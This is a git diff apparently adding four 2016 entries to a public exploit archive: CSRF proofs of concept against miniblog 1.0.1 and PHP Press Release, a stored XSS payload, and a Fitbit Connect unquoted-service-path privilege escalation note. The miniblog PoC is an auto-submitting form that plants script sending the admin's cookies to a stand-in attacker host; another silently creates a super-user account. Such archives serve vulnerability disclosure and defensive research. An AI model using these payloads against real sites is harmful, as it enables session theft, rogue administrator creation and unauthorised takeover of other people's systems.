diff --git a/files.csv b/files.csv
index e805aed85..9dec1da3b 100755
--- a/files.csv
+++ b/files.csv
@@ -36597,3 +36597,7 @@ id,file,description,date,author,platform,type,port
 40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
+40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
+40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
+40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
+40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
diff --git a/platforms/php/webapps/40480.txt b/platforms/php/webapps/40480.txt
new file mode 100755
index 000000000..68ed3f2d1
--- /dev/null
+++ b/platforms/php/webapps/40480.txt
@@ -0,0 +1,38 @@
+# Exploit Title :              miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
+# Author :                     Besim
+# Google Dork :                
+# Date :                       09/10/2016
+# Type :                       webapps
+# Platform :                   PHP
+# Vendor Homepage :  http://www.spyka.net/scripts/php/miniblog
+# Software link :
+http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip
+
+
+Description (admin login required) : 
+
+miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
+edit article in the sections
+
+Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add
+
+Dangerous point : if used with XSS can be steal on the admin's cookie information.
+
+
+*############### CSRF PoC ###############*
+
+
+<html> <!-- CSRF PoC --> <body> <form action="
+http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
+method="POST"> <input type="hidden" name="data&#91;post&#95;title&#93;"
+value="<script>location&#46;href&#32;&#61;&#32;â&#128;&#152;http&#58;&#47;&#47;www&#46;attackersite&#46;com&#47;stealer&#46;php&#63;cookie&#61;â&#128;&#153;&#43;document&#46;cookie&#59;<&#47;script>"
+/> <input type="hidden" name="data&#91;post&#95;content&#93;"
+value="tester" /> <input type="hidden" name="data&#91;published&#93;"
+value="1" /> <input type="hidden" name="miniblog&#95;PostBack" value="Add"
+/> <input type="submit" value="Submit request" /> </form> <script>
+document.forms[0].submit(); </script> </body> </html>
+
+
+
+########################################
+
diff --git a/platforms/php/webapps/40486.txt b/platforms/php/webapps/40486.txt
new file mode 100755
index 000000000..917b242bf
--- /dev/null
+++ b/platforms/php/webapps/40486.txt
@@ -0,0 +1,35 @@
+# Exploit Title :              PHP Press Release - Cross-Site Request Forgery (Add Admin - Super User )
+# Author :                     Besim
+# Google Dork :                 -
+# Date :                       09/10/2016
+# Type :                       webapps
+# Platform :                   PHP
+# Vendor Homepage :   http://www.pagereactions.com/product.php?pku=1
+ Software link :
+ http://www.pagereactions.com/downloads/phppressrelease.zip
+
+
+
+########################### CSRF PoC ###############################
+
+
+<html>
+  <!-- CSRF PoC  -->
+  <body>
+    <form action="http://sitename/phppressrelease/administration.php" method="POST">
+      <input type="hidden" name="pageaction" value="saveuser" />
+      <input type="hidden" name="subaction" value="submit" />
+      <input type="hidden" name="username" value="murat" />
+      <input type="hidden" name="password" value="murat" />
+      <input type="hidden" name="userfullname" value="murat&#32;tester" />
+      <input type="hidden" name="accesslevel" value="Super" />
+      <input type="hidden" name="userstatus" value="active" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      *document.forms[0].submit();*
+    </script>
+  </body>
+</html>
+
+####################################################################
diff --git a/platforms/php/webapps/40487.txt b/platforms/php/webapps/40487.txt
new file mode 100755
index 000000000..84367b008
--- /dev/null
+++ b/platforms/php/webapps/40487.txt
@@ -0,0 +1,22 @@
+# Exploit Title :              PHP Press Release* - Stored Cross Site
+Scripting*
+# Author :                     Besim
+# Google Dork :                 -
+# Date :                       09/10/2016
+# Type :                       webapps
+# Platform :                   PHP
+# Vendor Homepage :   http://www.pagereactions.com/product.php?pku=1
+# Software link :
+ http://www.pagereactions.com/downloads/phppressrelease.zip
+
+
+Description : 
+
+Vulnerable link :
+http://site_name/phppressrelease/administration.php?pageaction=newrelease
+
+Stored XSS Payload : 
+
+http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active
+
+
diff --git a/platforms/windows/local/40482.txt b/platforms/windows/local/40482.txt
new file mode 100755
index 000000000..3cefe5bc1
--- /dev/null
+++ b/platforms/windows/local/40482.txt
@@ -0,0 +1,29 @@
+Fitbit Connect Service: https://www.fitbit.com/
+By Ross Marks:          http://www.rossmarks.co.uk
+Exploit-db:             https://www.exploit-db.com/author/?a=8724
+Category:               Local
+Tested on:              Windows 10 x86/x64
+ 
+1) Unquoted Service Path Privilege Escalation 
+ 
+Fitbit connect installs as a service with an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
+ 
+A successful attempt would require the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+ 
+PoC:
+ 
+C:\>sc qc "Fitbit Connect"
+[SC] QueryServiceConfig SUCCESS
+ 
+SERVICE_NAME: Fitbit Connect
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Fitbit Connect Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : NT AUTHORITY\NetworkService
\ No newline at end of file
